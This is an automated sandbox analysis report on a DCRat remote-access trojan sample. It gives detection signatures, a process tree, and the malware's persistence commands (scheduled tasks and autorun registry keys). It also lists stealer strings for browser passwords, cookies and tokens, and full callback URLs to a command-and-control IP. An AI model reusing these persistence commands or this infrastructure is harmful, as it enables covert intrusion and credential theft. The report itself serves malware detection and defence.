Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7fGdoA6Inq.exe

Overview

General Information

Sample name:7fGdoA6Inq.exe
renamed because original name is a hash value
Original sample name:8B744166EECACE320158F4D0F704B13E.exe
Analysis ID:1573327
MD5:8b744166eecace320158f4d0f704b13e
SHA1:b92636084b3bd914514bc44556c4803933d667a3
SHA256:aa7a05956ca47e164a10a94d0bdbe01123b84eb01fad5e581e1e72b10d93d5a9
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Drops executable to a common third party application directory
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Suspicious File Created In PerfLogs
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 7fGdoA6Inq.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\7fGdoA6Inq.exe" MD5: 8B744166EECACE320158F4D0F704B13E)
    • schtasks.exe (PID: 7516 cmdline: schtasks.exe /create /tn "QtLimbtNymPOHuXh" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7540 cmdline: schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\PerfLogs\wininit.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7568 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 7596 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6PWFNNlUVO.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • w32tm.exe (PID: 7652 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • 7fGdoA6Inq.exe (PID: 7868 cmdline: "C:\Users\user\Desktop\7fGdoA6Inq.exe" MD5: 8B744166EECACE320158F4D0F704B13E)
  • QtLimbtNymPOHuXh.exe (PID: 7668 cmdline: "C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe" MD5: 8B744166EECACE320158F4D0F704B13E)
  • RuntimeBroker.exe (PID: 7692 cmdline: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe MD5: 8B744166EECACE320158F4D0F704B13E)
  • wininit.exe (PID: 7716 cmdline: C:\PerfLogs\wininit.exe MD5: 8B744166EECACE320158F4D0F704B13E)
  • QtLimbtNymPOHuXh.exe (PID: 8028 cmdline: "C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe" MD5: 8B744166EECACE320158F4D0F704B13E)
  • QtLimbtNymPOHuXh.exe (PID: 4548 cmdline: "C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe" MD5: 8B744166EECACE320158F4D0F704B13E)
  • QtLimbtNymPOHuXh.exe (PID: 7584 cmdline: "C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe" MD5: 8B744166EECACE320158F4D0F704B13E)
  • QtLimbtNymPOHuXh.exe (PID: 1900 cmdline: "C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe" MD5: 8B744166EECACE320158F4D0F704B13E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
7fGdoA6Inq.exeMALWARE_Win_DCRatDCRat payloadditekSHen
  • 0x254f72:$v8: %SystemDrive% - Slow
  • 0x254f9c:$v9: %UsersFolder% - Fast
  • 0x254fc6:$v10: %AppData% - Very Fast
  • 0x295964:$px1: [Browsers] Scanned elements:
  • 0x2959a0:$px2: [Browsers] Grabbing cookies
  • 0x295a38:$px3: [Browsers] Grabbing passwords
  • 0x295ae0:$px4: [Browsers] Grabbing forms
  • 0x295b68:$px5: [Browsers] Grabbing CC
  • 0x295bd8:$px6: [Browsers] Grabbing history
  • 0x295c70:$px7: [StealerPlugin] Invoke:
  • 0x295ca2:$px8: [Other] Grabbing steam
  • 0x295d0a:$px9: [Other] Grabbing telegram
  • 0x295d5e:$px10: [Other] Grabbing discord tokens
  • 0x295dc4:$px11: [Other] Grabbing filezilla
  • 0x295eee:$px12: [Other] Screenshots:
  • 0x295f60:$px13: [Other] Clipboard
  • 0x295f84:$px14: [Other] Saving system information

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeMALWARE_Win_DCRatDCRat payloadditekSHen
  • 0x254f72:$v8: %SystemDrive% - Slow
  • 0x254f9c:$v9: %UsersFolder% - Fast
  • 0x254fc6:$v10: %AppData% - Very Fast
  • 0x295964:$px1: [Browsers] Scanned elements:
  • 0x2959a0:$px2: [Browsers] Grabbing cookies
  • 0x295a38:$px3: [Browsers] Grabbing passwords
  • 0x295ae0:$px4: [Browsers] Grabbing forms
  • 0x295b68:$px5: [Browsers] Grabbing CC
  • 0x295bd8:$px6: [Browsers] Grabbing history
  • 0x295c70:$px7: [StealerPlugin] Invoke:
  • 0x295ca2:$px8: [Other] Grabbing steam
  • 0x295d0a:$px9: [Other] Grabbing telegram
  • 0x295d5e:$px10: [Other] Grabbing discord tokens
  • 0x295dc4:$px11: [Other] Grabbing filezilla
  • 0x295eee:$px12: [Other] Screenshots:
  • 0x295f60:$px13: [Other] Clipboard
  • 0x295f84:$px14: [Other] Saving system information
C:\PerfLogs\wininit.exeMALWARE_Win_DCRatDCRat payloadditekSHen
  • 0x254f72:$v8: %SystemDrive% - Slow
  • 0x254f9c:$v9: %UsersFolder% - Fast
  • 0x254fc6:$v10: %AppData% - Very Fast
  • 0x295964:$px1: [Browsers] Scanned elements:
  • 0x2959a0:$px2: [Browsers] Grabbing cookies
  • 0x295a38:$px3: [Browsers] Grabbing passwords
  • 0x295ae0:$px4: [Browsers] Grabbing forms
  • 0x295b68:$px5: [Browsers] Grabbing CC
  • 0x295bd8:$px6: [Browsers] Grabbing history
  • 0x295c70:$px7: [StealerPlugin] Invoke:
  • 0x295ca2:$px8: [Other] Grabbing steam
  • 0x295d0a:$px9: [Other] Grabbing telegram
  • 0x295d5e:$px10: [Other] Grabbing discord tokens
  • 0x295dc4:$px11: [Other] Grabbing filezilla
  • 0x295eee:$px12: [Other] Screenshots:
  • 0x295f60:$px13: [Other] Clipboard
  • 0x295f84:$px14: [Other] Saving system information
C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeMALWARE_Win_DCRatDCRat payloadditekSHen
  • 0x254f72:$v8: %SystemDrive% - Slow
  • 0x254f9c:$v9: %UsersFolder% - Fast
  • 0x254fc6:$v10: %AppData% - Very Fast
  • 0x295964:$px1: [Browsers] Scanned elements:
  • 0x2959a0:$px2: [Browsers] Grabbing cookies
  • 0x295a38:$px3: [Browsers] Grabbing passwords
  • 0x295ae0:$px4: [Browsers] Grabbing forms
  • 0x295b68:$px5: [Browsers] Grabbing CC
  • 0x295bd8:$px6: [Browsers] Grabbing history
  • 0x295c70:$px7: [StealerPlugin] Invoke:
  • 0x295ca2:$px8: [Other] Grabbing steam
  • 0x295d0a:$px9: [Other] Grabbing telegram
  • 0x295d5e:$px10: [Other] Grabbing discord tokens
  • 0x295dc4:$px11: [Other] Grabbing filezilla
  • 0x295eee:$px12: [Other] Screenshots:
  • 0x295f60:$px13: [Other] Clipboard
  • 0x295f84:$px14: [Other] Saving system information

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.2144498609.0000000003171000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000007.00000002.1819598720.0000000002F71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      Process Memory Space: 7fGdoA6Inq.exe PID: 7404JoeSecurity_DCRat_1Yara detected DCRatJoe Security
        Process Memory Space: QtLimbtNymPOHuXh.exe PID: 7668JoeSecurity_DCRat_1Yara detected DCRatJoe Security
          Process Memory Space: QtLimbtNymPOHuXh.exe PID: 8028JoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.0.7fGdoA6Inq.exe.380000.0.unpackMALWARE_Win_DCRatDCRat payloadditekSHen
            • 0x254f72:$v8: %SystemDrive% - Slow
            • 0x254f9c:$v9: %UsersFolder% - Fast
            • 0x254fc6:$v10: %AppData% - Very Fast
            • 0x295964:$px1: [Browsers] Scanned elements:
            • 0x2959a0:$px2: [Browsers] Grabbing cookies
            • 0x295a38:$px3: [Browsers] Grabbing passwords
            • 0x295ae0:$px4: [Browsers] Grabbing forms
            • 0x295b68:$px5: [Browsers] Grabbing CC
            • 0x295bd8:$px6: [Browsers] Grabbing history
            • 0x295c70:$px7: [StealerPlugin] Invoke:
            • 0x295ca2:$px8: [Other] Grabbing steam
            • 0x295d0a:$px9: [Other] Grabbing telegram
            • 0x295d5e:$px10: [Other] Grabbing discord tokens
            • 0x295dc4:$px11: [Other] Grabbing filezilla
            • 0x295eee:$px12: [Other] Screenshots:
            • 0x295f60:$px13: [Other] Clipboard
            • 0x295f84:$px14: [Other] Saving system information

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Execution from Suspicious Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\PerfLogs\wininit.exe, CommandLine: C:\PerfLogs\wininit.exe, CommandLine|base64offset|contains: , Image: C:\PerfLogs\wininit.exe, NewProcessName: C:\PerfLogs\wininit.exe, OriginalFileName: C:\PerfLogs\wininit.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\PerfLogs\wininit.exe, ProcessId: 7716, ProcessName: wininit.exe
            Sigma detected: Files With System Process Name In Unsuspected Locations
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\7fGdoA6Inq.exe, ProcessId: 7404, TargetFilename: C:\PerfLogs\wininit.exe
            Sigma detected: System File Execution Location Anomaly
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\PerfLogs\wininit.exe, CommandLine: C:\PerfLogs\wininit.exe, CommandLine|base64offset|contains: , Image: C:\PerfLogs\wininit.exe, NewProcessName: C:\PerfLogs\wininit.exe, OriginalFileName: C:\PerfLogs\wininit.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\PerfLogs\wininit.exe, ProcessId: 7716, ProcessName: wininit.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\7fGdoA6Inq.exe, ProcessId: 7404, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QtLimbtNymPOHuXh
            Sigma detected: CurrentVersion NT Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\7fGdoA6Inq.exe, ProcessId: 7404, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
            Sigma detected: Suspicious File Created In PerfLogs
            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\7fGdoA6Inq.exe, ProcessId: 7404, TargetFilename: C:\PerfLogs\wininit.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\PerfLogs\wininit.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\PerfLogs\wininit.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\7fGdoA6Inq.exe", ParentImage: C:\Users\user\Desktop\7fGdoA6Inq.exe, ParentProcessId: 7404, ParentProcessName: 7fGdoA6Inq.exe, ProcessCommandLine: schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\PerfLogs\wininit.exe'" /rl HIGHEST /f, ProcessId: 7540, ProcessName: schtasks.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: C:\PerfLogs\wininit.exe, CommandLine: C:\PerfLogs\wininit.exe, CommandLine|base64offset|contains: , Image: C:\PerfLogs\wininit.exe, NewProcessName: C:\PerfLogs\wininit.exe, OriginalFileName: C:\PerfLogs\wininit.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\PerfLogs\wininit.exe, ProcessId: 7716, ProcessName: wininit.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Schedule system process
            Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\PerfLogs\wininit.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\PerfLogs\wininit.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\7fGdoA6Inq.exe", ParentImage: C:\Users\user\Desktop\7fGdoA6Inq.exe, ParentProcessId: 7404, ParentProcessName: 7fGdoA6Inq.exe, ProcessCommandLine: schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\PerfLogs\wininit.exe'" /rl HIGHEST /f, ProcessId: 7540, ProcessName: schtasks.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-11T20:47:08.931403+010020341941A Network Trojan was detected192.168.2.44973078.24.221.19680TCP
            2024-12-11T20:47:11.947042+010020341941A Network Trojan was detected192.168.2.44973278.24.221.19680TCP
            2024-12-11T20:47:16.634554+010020341941A Network Trojan was detected192.168.2.44973678.24.221.19680TCP
            2024-12-11T20:47:19.744052+010020341941A Network Trojan was detected192.168.2.44974078.24.221.19680TCP
            2024-12-11T20:47:41.447118+010020341941A Network Trojan was detected192.168.2.44974478.24.221.19680TCP
            2024-12-11T20:48:06.431659+010020341941A Network Trojan was detected192.168.2.44977078.24.221.19680TCP
            2024-12-11T20:48:09.560672+010020341941A Network Trojan was detected192.168.2.44977778.24.221.19680TCP
            2024-12-11T20:48:30.587834+010020341941A Network Trojan was detected192.168.2.44982978.24.221.19680TCP
            2024-12-11T20:48:33.631544+010020341941A Network Trojan was detected192.168.2.44983678.24.221.19680TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: 7fGdoA6Inq.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://78.24.221.196/destenyserver/serverWindows.php?GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwh&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwhAvira URL Cloud: Label: malware
            Source: http://78.24.221.196/destenyserver/serverWindows.php?vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1Avira URL Cloud: Label: malware
            Source: http://78.24.221.196/destenyserver/serverWindows.php?1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmAvira URL Cloud: Label: malware
            Source: https://78.24.221.196:443/destenyserver/serverWindows.php?2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383Avira URL Cloud: Label: malware
            Source: http://78.24.221.196/destenyserver/serverWindows.php?GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2Avira URL Cloud: Label: malware
            Source: https://78.24.221.196:443/destenyserver/serverWindows.php?GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHAvira URL Cloud: Label: malware
            Source: http://78.24.221.196/destenyserver/serverWindows.php?vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&iAvira URL Cloud: Label: malware
            Source: https://78.24.221.196:443/destenyserver/serverWindows.php?1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&Avira URL Cloud: Label: malware
            Source: https://78.24.221.196:443/destenyserver/serverWindows.php?vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCAvira URL Cloud: Label: malware
            Source: http://78.24.221.196/destenyserver/serverWindows.php?1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0I&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0IAvira URL Cloud: Label: malware
            Source: http://78.24.221.196/destenyserver/serverWindows.php?2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpAvira URL Cloud: Label: malware
            Source: http://78.24.221.196/destenyserver/serverWindows.php?2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MD&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MDAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Users\user\AppData\Local\Temp\6PWFNNlUVO.batAvira: detection malicious, Label: BAT/Delbat.C
            Source: C:\PerfLogs\wininit.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Multi AV Scanner detection for dropped file
            Source: C:\PerfLogs\wininit.exeReversingLabs: Detection: 87%
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeReversingLabs: Detection: 87%
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeReversingLabs: Detection: 87%
            Multi AV Scanner detection for submitted file
            Source: 7fGdoA6Inq.exeReversingLabs: Detection: 87%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Machine Learning detection for dropped file
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeJoe Sandbox ML: detected
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeJoe Sandbox ML: detected
            Source: C:\PerfLogs\wininit.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: 7fGdoA6Inq.exeJoe Sandbox ML: detected
            Source: 7fGdoA6Inq.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 78.24.221.196:443 -> 192.168.2.4:49731 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 78.24.221.196:443 -> 192.168.2.4:49731 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 78.24.221.196:443 -> 192.168.2.4:49733 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 78.24.221.196:443 -> 192.168.2.4:49738 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 78.24.221.196:443 -> 192.168.2.4:49742 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 78.24.221.196:443 -> 192.168.2.4:49745 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 78.24.221.196:443 -> 192.168.2.4:49771 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 78.24.221.196:443 -> 192.168.2.4:49830 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 78.24.221.196:443 -> 192.168.2.4:49842 version: TLS 1.0
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeDirectory created: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeDirectory created: C:\Program Files\Mozilla Firefox\733f5148eb4a0e104b3ec895f92fbabca269cbccJump to behavior
            Source: 7fGdoA6Inq.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeCode function: 4x nop then jmp 00007FFD9B8A88BEh0_2_00007FFD9B8A872C
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeCode function: 4x nop then call 00007FFDF9CF0C30h0_2_00007FFD9B8A7BDD
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 4x nop then call 00007FFDF9F10C30h7_2_00007FFD9BAB7BD2
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 4x nop then jmp 00007FFD9BAB88BEh7_2_00007FFD9BAB872C
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 4x nop then call 00007FFDF9F10C30h12_2_00007FFD9BAC7BD2
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 4x nop then jmp 00007FFD9BAC88BEh12_2_00007FFD9BAC872C
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 4x nop then call 00007FFDF9E50C30h15_2_00007FFD9BAC7BD2
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 4x nop then jmp 00007FFD9BAC88BEh15_2_00007FFD9BAC872C
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 4x nop then call 00007FFDF9F10C30h16_2_00007FFD9BAB7BD2
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 4x nop then jmp 00007FFD9BAB88BEh16_2_00007FFD9BAB872C
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 4x nop then call 00007FFDF9F10C30h18_2_00007FFD9BAC7BD2
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 4x nop then jmp 00007FFD9BAC88BEh18_2_00007FFD9BAC872C

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49732 -> 78.24.221.196:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49744 -> 78.24.221.196:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49740 -> 78.24.221.196:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49736 -> 78.24.221.196:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49777 -> 78.24.221.196:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49770 -> 78.24.221.196:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49829 -> 78.24.221.196:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49730 -> 78.24.221.196:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49836 -> 78.24.221.196:80
            Source: Joe Sandbox ViewASN Name: THEFIRST-ASRU THEFIRST-ASRU
            Source: Joe Sandbox ViewJA3 fingerprint: fc54e0d16d9764783542f0146a98b300
            Source: global trafficHTTP traffic detected: GET /destenyserver/serverWindows.php?vggpOLXPYLvMf5H5IvGMGdLPHKjxIru=tNEyeb&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&vggpOLXPYLvMf5H5IvGMGdLPHKjxIru=tNEyeb HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Mobile Safari/537.36 Edge/13.10586Host: 78.24.221.196Connection: Keep-Alive
